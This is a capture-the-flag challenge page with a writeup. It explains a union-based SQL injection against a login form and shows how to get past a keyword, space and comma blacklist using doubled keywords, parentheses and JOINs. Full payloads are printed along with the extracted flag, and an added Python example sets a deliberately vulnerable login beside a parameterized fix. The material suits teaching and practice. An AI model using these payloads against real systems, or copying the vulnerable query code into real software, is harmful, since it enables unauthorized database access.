Medium/hard: Can you find the flag via SQL injection?
Important information
Challenges do NOT require any bruteforcing/directory fuzzing/massive amounts of traffic unless clearly specified in the challenge information below.
Challenge Information
The form is vulnerable to SQL injection and there's a flag inside the database waiting for you. Using ONLY union based injection, can you retrieve it?
 
Challenge Solutions
Solution from noob
Note: xD so I forgot to add filters/blacklist to the 'password' parameter and many people solved it that way; I later realized it when someone shared his solution to my challenge with me. So I have fixed it now. For those who did it that way ;) try now!
In this challenge, the task was to evade the SQL blacklist/filters and get the flag in a single request, so the following hints were given on https://www.bugbountynotes.com/challenge?id=7:
- Observe the SQL Error to see if there are any blacklistings on some special characters
Explanation:
After some hit and trial, and since the errors were verbose, one could identify that whitespace, commas (,), 'and', 'or', '/' etc. were converted to empty strings. With username 'xxorxxandxx test' you can see in the error that only xxxxxx is present, which means the 'or' and 'and' keywords were removed, but you can use 'oorr', which would evaluate to 'or', and similarly for 'and' and other keywords.
- In SQL you can use parentheses in a lot of places instead of spaces
Explanation: In SQL you can use parentheses or brackets in various places and avoid spaces; that way it was possible to bypass the whitespace filter.
1. To find the number of columns used in a table you can use a trick like
select ((select * from {table}))=1
This query will throw an error and reveal the number of columns in the table. But since the schema was already given (added later to the challenge), you knew the table name (flag) and the column names, so it was easy to know the number of columns present; even without this information, though, you could have used
'anandd(select*from(flag))=1#
and this will tell you there are four columns in the table, where # is a SQL comment and will comment out the rest of the query.
Note: I used anandd because 'and' was converted to '', so 'anandd' becomes 'and'.
- We can join different tables in SQL
Since commas are blocked we can't use union select with more than 1 column; however, there are 4 columns in the table of the current query, and for a union clause both tables must have an equal number of columns. In that case we could use SQL joins and completely bypass commas (,).
1. Union Clause
As I had already given information (column names, table names etc.) to make the challenge easier, which wasn't necessary, we could have used something like this
Solution: xxx'Union(select*from(select(1))a
join(select(2))b
join(select(3))c
join(select(4))d
)#
Explanation:
JOIN is used to join 2 or more tables in SQL. It will combine the rows and columns of both tables. The more tables you combine, the more the rows and columns increase, and all we care about is matching the number of columns of the original table so we can successfully use the Union clause. So what we do is:
Union Select * from (select 'tbl1 column') alias_table1
join (select 'tbl2 column') alias_table2
join (select 'tbl3 column') alias_table3
join (select 'tbl4 column') alias_table4
So let's divide it into parts and understand:
(select 'tbl1 column') alias_table1
This part of the query creates an alias/temporary table named 'alias_table1' with one column whose value is "tbl1 column". Similarly we create 3 more such "fake" tables with their aliases and join them with the "JOIN" operator. Thus joining 4 tables with 1 column each gives a total of 4 columns, which was the same as the number of columns in the original table and the required situation for using Union Select.
Now all we had to do was remove the spaces and make it shorter, for which we could have used spaces;
to make the query small and clean I have used a, b, c, d... etc. as alias names for the tables.
xxx'Union(select*from(select(1))a
join(select(2))b
join(select(3))c
join(select(4))d
)#
Now, after using this payload, we see that it shows "Logged in as '2'" in the response of the page, which means we could control the column of the table aliased as 'b'.
2. Extracting the flag
Simply extract the flag column from the flag table and we'll get the flag contents in the response. Use this query (select(flag)from(flag)) in place of the column of table 'b', since only that column was visible on the page:
xxx'Union(select*from(select(1))a
join(select(flag)from(flag))b
join(select(3))c
join(select(4))d
)#
and boom!
Logged In! as : flag{dDhbLnVnQF1UOypEbmtjd24jQ1VpP21fckNKLHZMI112QEFrKEItMzJ9fUBfLHRjTjozWFNETUxpQFNUViglLmo1Kmp6JnldTksofTItYWN2dHlxVmJKIyU9Vy57e0F3aWFKbip0M3JxOGZ0ejo1JXtSM241UXEsdk5uW2NkLnpOW2docXZucj1LaCpXdlB6R3A7ZHQ6OFY3VC5fcSpqdjVSUll9NjpoQCU5dSo9ejUmPXolMz9kMltMejVDQW1YM0hUWkdBKjZdV1VQcCwuJVgzI0UlRiw2ODJoTVR4JiFLI3lyIUxqdXhYa3lpKUYpLzMzNUZoSyM2cnY9cEw6ZilTSEFLUD8rKT9LVGJjTnpmRC1LbnlaR1l1Mj1aaHgjU3JoNipBWllTdTIpCg==}
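As an added example (not part of the writeup or the challenge's own code): a SQLite model of the login form showing the single-pass keyword blacklist the solution relies on, the JOIN column-count trick from the explanation above, and the parameterized query that makes the same input harmless. Everything except the `flag` table name is assumed, and SQLite's `--` comment stands in for the MySQL `#` used in the writeup.

```python
# Added example (not from the writeup): SQLite model of the challenge login form
# with its single-pass blacklist, the JOIN column-count trick, and the fixed form.
# Names other than `flag` are made up; `--` stands in for MySQL's `#` comment.
import sqlite3

# Tokens the challenge stripped (replaced with '') in a single pass.
BLACKLIST = (" ", ",", "/", "and", "or")

def weak_filter(value: str) -> str:
    """Single-pass removal, so 'anandd' -> 'and' and 'oorr' -> 'or'."""
    for token in BLACKLIST:
        value = value.replace(token, "")
    return value

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 'hunter2');
        CREATE TABLE flag(id INTEGER, flag TEXT, c3 TEXT, c4 TEXT);  -- 4 columns
        INSERT INTO flag VALUES (1, 'flag{constructed-sample}', '', '');
    """)
    return conn

def join_width(conn: sqlite3.Connection) -> int:
    """Four one-column derived tables JOINed together give one 4-column row,
    which is why the writeup's UNION needs no commas."""
    sql = ("SELECT * FROM (SELECT 1) a JOIN (SELECT 2) b "
           "JOIN (SELECT 3) c JOIN (SELECT 4) d")
    return len(conn.execute(sql).fetchone())

def vulnerable_login(conn, username: str, password: str):
    """Filter-then-concatenate, as the challenge did; errors echoed verbatim."""
    u, p = weak_filter(username), weak_filter(password)
    sql = f"SELECT username FROM users WHERE username='{u}' AND password='{p}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return f"ERROR: {exc}"  # verbose error reveals how the query was parsed
    return row[0] if row else None

def safe_login(conn, username: str, password: str):
    """Bound parameters: the same payload is a username that matches nobody."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None
```

The verbose error from `vulnerable_login` is the same signal the writeup reads to learn the query structure; `safe_login` never builds SQL from the input, so no blacklist is needed.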
Challenge URL: https://root0x00.altervista.org/sqli.php